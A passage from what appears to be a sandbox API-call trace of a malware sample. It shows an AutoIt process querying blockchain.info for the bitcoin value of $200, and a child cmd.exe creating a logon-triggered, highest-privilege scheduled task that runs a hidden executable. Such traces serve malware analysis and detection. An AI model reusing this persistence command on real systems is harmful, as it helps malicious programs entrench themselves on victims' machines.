(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ba70 [0045.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b7e8 [0045.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af278 [0045.669] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0045.669] PeekMessageW (in: lpMsg=0x6ae2fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae2fc) returned 0 [0045.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2bd8 [0045.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a18 [0045.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afdd8 [0045.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c430 [0045.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889568 [0045.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afcd8 [0045.669] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0045.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889790 [0045.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afad8 [0045.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afc88 [0045.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0045.669] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x74140000 [0045.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b5a8 [0045.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afbe8 [0045.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferSize", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0045.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0xaa9388 [0045.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferSize", cchWideChar=17, lpMultiByteStr=0xaa9388, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetApiBufferSize", lpUsedDefaultChar=0x0) returned 17 [0045.676] NetApiBufferSize (in: Buffer=0xaa29a0, ByteCount=0x6adc98 | out: ByteCount=0x6adc98) returned 0x0 [0045.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afad8 [0045.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b7d08 [0045.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88b590 [0045.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b7d0 [0045.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b7a0 [0045.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b620 [0045.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afbe8 [0045.676] FreeLibrary (hLibModule=0x74140000) returned 1 [0045.697] PeekMessageW (in: lpMsg=0x6ae2fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae2fc) returned 0 [0045.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afcd8 [0045.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8380 [0045.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe18 [0045.697] PeekMessageW (in: lpMsg=0x6ae2fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae2fc) returned 0 [0045.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afcd8 [0045.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe18 [0045.697] CharLowerBuffW (in: lpsz="wchar[40]", cchLength=0x9 | out: lpsz="wchar[40]") returned 0x9 [0045.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0xaa2940 [0045.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b6f8 [0045.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4d8 [0045.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a18 [0045.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd88 [0045.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c430 [0045.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afad8 [0045.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b590 [0045.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afcf8 [0045.697] PeekMessageW (in: lpMsg=0x6ae94c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae94c) returned 0 [0045.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2d90 [0045.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a30 [0045.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af278 [0045.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b7e8 [0045.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b908 [0045.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdd8 [0045.743] PeekMessageW (in: lpMsg=0x6ae94c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae94c) returned 0 [0045.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2c00 [0045.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c430 [0045.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afdd8 [0045.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b908 [0045.743] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0045.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b698 [0045.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afd88 [0045.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afad8 [0045.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b818 [0045.743] LoadLibraryW (lpLibFileName="netapi32.dll") returned 0x74160000 [0045.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b5f0 [0045.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afcf8 [0045.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferFree", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0045.750] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0xaa9388 [0045.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferFree", cchWideChar=17, lpMultiByteStr=0xaa9388, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetApiBufferFree", lpUsedDefaultChar=0x0) returned 17 [0045.751] NetApiBufferFree (Buffer=0xaa29a0) returned 0x0 [0045.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afcf8 [0045.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b7d08 [0045.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afd88 [0045.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88bb18 [0045.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b890 [0045.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b848 [0045.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afcd8 [0045.751] FreeLibrary (hLibModule=0x74160000) returned 1 [0045.753] PeekMessageW (in: lpMsg=0x6ae94c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae94c) returned 0 [0045.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2c00 [0045.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88b890 [0045.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afcf8 [0045.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88bb18 [0045.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88bb00 [0045.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afd88 [0045.753] PeekMessageW (in: lpMsg=0x6ae94c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae94c) returned 0 [0045.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afcd8 [0045.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7afe18 [0045.753] PeekMessageW (in: lpMsg=0x6aee7c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aee7c) returned 0 [0045.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe18 [0045.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afd88 [0045.753] PeekMessageW (in: lpMsg=0x6aee7c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aee7c) returned 0 [0045.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afe18 [0045.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896e8 [0045.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7afd88 [0045.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0xaa9308 [0045.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af278 [0045.754] PeekMessageW (in: lpMsg=0x6aee7c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aee7c) returned 0 [0045.754] PeekMessageW (in: lpMsg=0x6aee7c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aee7c) returned 0 [0045.754] PeekMessageW (in: lpMsg=0x6aee7c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aee7c) returned 0 [0045.754] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0045.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af548 [0045.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b2c00 [0045.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896d0 [0045.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af418 [0045.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889448 [0045.797] InternetCrackUrlW (in: lpszUrl="https://blockchain.info/tobtc?currency=USD&value=200", dwUrlLength=0x34, dwFlags=0x0, lpUrlComponents=0x6aed20 | out: lpUrlComponents=0x6aed20) returned 1 [0047.823] InternetOpenW (lpszAgent="AutoIt", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0047.824] InternetSetOptionW (hInternet=0x0, dwOption=0x32, lpBuffer=0x6aed68, dwBufferLength=0x8) returned 1 [0047.828] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x6aed74 | out: lpBuffer=0x0, lpdwBufferLength=0x6aed74) returned 0 [0049.496] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88b710 [0049.496] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0x88b710, lpdwBufferLength=0x6aed74 | out: lpBuffer=0x88b710, lpdwBufferLength=0x6aed74) returned 1 [0049.496] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88b710 | out: hHeap=0x770000) returned 1 [0049.496] InternetConnectW (hInternet=0xcc0004, lpszServerName="blockchain.info", nServerPort=0x1bb, lpszUserName="", lpszPassword="", dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0049.501] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="/tobtc?currency=USD&value=200", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0053.504] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) Thread: id = 11 os_tid = 0x328 Thread: id = 12 os_tid = 0x55c Thread: id = 13 os_tid = 0xb58 Thread: id = 14 os_tid = 0xb48 Thread: id = 49 os_tid = 0x910 Thread: id = 58 os_tid = 0x980 Thread: id = 65 os_tid = 0xb3c Thread: id = 67 os_tid = 0xb74 Thread: id = 68 os_tid = 0xbdc Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x338f6000" os_pid = "0xae4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x35c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 2 os_tid = 0x494 [0027.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f86c | out: lpSystemTimeAsFileTime=0x24f86c*(dwLowDateTime=0x11008200, dwHighDateTime=0x1d5e3d9)) [0027.885] GetCurrentProcessId () returned 0xae4 [0027.885] GetCurrentThreadId () returned 0x494 [0027.886] GetTickCount () returned 0x1152730 [0027.886] QueryPerformanceCounter (in: lpPerformanceCount=0x24f864 | out: lpPerformanceCount=0x24f864*=16980804188) returned 1 [0027.887] GetModuleHandleA (lpModuleName=0x0) returned 0x4a000000 [0027.887] __set_app_type (_Type=0x1) [0027.887] __p__fmode () returned 0x76be31f4 [0027.889] __p__commode () returned 0x76be31fc [0027.889] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0221a6) returned 0x0 [0027.889] __getmainargs (in: _Argc=0x4a024238, _Argv=0x4a024240, _Env=0x4a02423c, _DoWildCard=0, _StartInfo=0x4a024140 | out: _Argc=0x4a024238, _Argv=0x4a024240, _Env=0x4a02423c) returned 0 [0027.889] GetCurrentThreadId () returned 0x494 [0027.889] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x494) returned 0x60 [0027.889] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0027.889] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadUILanguage") returned 0x76e3a84f [0027.890] SetThreadUILanguage (LangId=0x0) returned 0x409 [0027.890] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0027.890] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f7fc | out: phkResult=0x24f7fc*=0x0) returned 0x2 [0027.890] VirtualQuery (in: lpAddress=0x24f833, lpBuffer=0x24f7cc, dwLength=0x1c | out: lpBuffer=0x24f7cc*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.890] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f7cc, dwLength=0x1c | out: lpBuffer=0x24f7cc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0027.890] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f7cc, dwLength=0x1c | out: lpBuffer=0x24f7cc*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0027.890] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f7cc, dwLength=0x1c | out: lpBuffer=0x24f7cc*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.890] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f7cc, dwLength=0x1c | out: lpBuffer=0x24f7cc*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0027.890] GetConsoleOutputCP () returned 0x1b5 [0027.890] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a024260 | out: lpCPInfo=0x4a024260) returned 1 [0027.891] SetConsoleCtrlHandler (HandlerRoutine=0x4a01e72a, Add=1) returned 1 [0027.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0027.891] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0027.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0027.891] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0241ac | out: lpMode=0x4a0241ac) returned 1 [0027.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0027.891] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0027.891] _get_osfhandle (_FileHandle=0) returned 0x3 [0027.891] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0241b0 | out: lpMode=0x4a0241b0) returned 1 [0027.893] _get_osfhandle (_FileHandle=0) returned 0x3 [0027.893] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0027.893] GetEnvironmentStringsW () returned 0x622118* [0027.893] GetProcessHeap () returned 0x610000 [0027.893] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xaca) returned 0x622bf0 [0027.893] FreeEnvironmentStringsW (penv=0x622118) returned 1 [0027.893] GetProcessHeap () returned 0x610000 [0027.893] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4) returned 0x6218b0 [0027.893] GetEnvironmentStringsW () returned 0x622118* [0027.893] GetProcessHeap () returned 0x610000 [0027.893] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xaca) returned 0x6236c8 [0027.893] FreeEnvironmentStringsW (penv=0x622118) returned 1 [0027.893] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e76c | out: phkResult=0x24e76c*=0x68) returned 0x0 [0027.894] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e774, lpData=0x24e778, lpcbData=0x24e770*=0x1000 | out: lpType=0x24e774*=0x0, lpData=0x24e778*=0x0, lpcbData=0x24e770*=0x1000) returned 0x2 [0027.894] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e774, lpData=0x24e778, lpcbData=0x24e770*=0x1000 | out: lpType=0x24e774*=0x4, lpData=0x24e778*=0x1, lpcbData=0x24e770*=0x4) returned 0x0 [0027.894] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e774, lpData=0x24e778, lpcbData=0x24e770*=0x1000 | out: lpType=0x24e774*=0x0, lpData=0x24e778*=0x1, lpcbData=0x24e770*=0x1000) returned 0x2 [0027.894] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e774, lpData=0x24e778, lpcbData=0x24e770*=0x1000 | out: lpType=0x24e774*=0x4, lpData=0x24e778*=0x0, lpcbData=0x24e770*=0x4) returned 0x0 [0027.894] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e774, lpData=0x24e778, lpcbData=0x24e770*=0x1000 | out: lpType=0x24e774*=0x4, lpData=0x24e778*=0x40, lpcbData=0x24e770*=0x4) returned 0x0 [0027.894] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e774, lpData=0x24e778, lpcbData=0x24e770*=0x1000 | out: lpType=0x24e774*=0x4, lpData=0x24e778*=0x40, lpcbData=0x24e770*=0x4) returned 0x0 [0027.894] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e774, lpData=0x24e778, lpcbData=0x24e770*=0x1000 | out: lpType=0x24e774*=0x0, lpData=0x24e778*=0x40, lpcbData=0x24e770*=0x1000) returned 0x2 [0027.894] RegCloseKey (hKey=0x68) returned 0x0 [0027.894] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e76c | out: phkResult=0x24e76c*=0x68) returned 0x0 [0027.894] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e774, lpData=0x24e778, lpcbData=0x24e770*=0x1000 | out: lpType=0x24e774*=0x0, lpData=0x24e778*=0x40, lpcbData=0x24e770*=0x1000) returned 0x2 [0027.894] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e774, lpData=0x24e778, lpcbData=0x24e770*=0x1000 | out: lpType=0x24e774*=0x4, lpData=0x24e778*=0x1, lpcbData=0x24e770*=0x4) returned 0x0 [0027.894] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e774, lpData=0x24e778, lpcbData=0x24e770*=0x1000 | out: lpType=0x24e774*=0x0, lpData=0x24e778*=0x1, lpcbData=0x24e770*=0x1000) returned 0x2 [0027.894] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e774, lpData=0x24e778, lpcbData=0x24e770*=0x1000 | out: lpType=0x24e774*=0x4, lpData=0x24e778*=0x0, lpcbData=0x24e770*=0x4) returned 0x0 [0027.894] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e774, lpData=0x24e778, lpcbData=0x24e770*=0x1000 | out: lpType=0x24e774*=0x4, lpData=0x24e778*=0x9, lpcbData=0x24e770*=0x4) returned 0x0 [0027.894] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e774, lpData=0x24e778, lpcbData=0x24e770*=0x1000 | out: lpType=0x24e774*=0x4, lpData=0x24e778*=0x9, lpcbData=0x24e770*=0x4) returned 0x0 [0027.894] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e774, lpData=0x24e778, lpcbData=0x24e770*=0x1000 | out: lpType=0x24e774*=0x0, lpData=0x24e778*=0x9, lpcbData=0x24e770*=0x1000) returned 0x2 [0027.895] RegCloseKey (hKey=0x68) returned 0x0 [0027.895] time (in: timer=0x0 | out: timer=0x0) returned 0x5e47aa46 [0027.895] srand (_Seed=0x5e47aa46) [0027.895] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" [0027.895] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" [0027.896] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a025260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0027.896] GetProcessHeap () returned 0x610000 [0027.896] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x622118 [0027.896] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x622120, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0027.897] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a030640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0027.897] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a030640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0027.897] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a030640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0027.897] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0027.897] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0027.897] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0027.897] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0027.897] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0027.897] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0027.897] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0027.897] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0027.897] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0027.897] GetProcessHeap () returned 0x610000 [0027.897] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x622bf0 | out: hHeap=0x610000) returned 1 [0027.897] GetEnvironmentStringsW () returned 0x622330* [0027.897] GetProcessHeap () returned 0x610000 [0027.897] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xae2) returned 0x624c90 [0027.897] FreeEnvironmentStringsW (penv=0x622330) returned 1 [0027.897] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a030640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0027.898] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a030640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0027.898] _wcsicmp (_String1="KEYS", 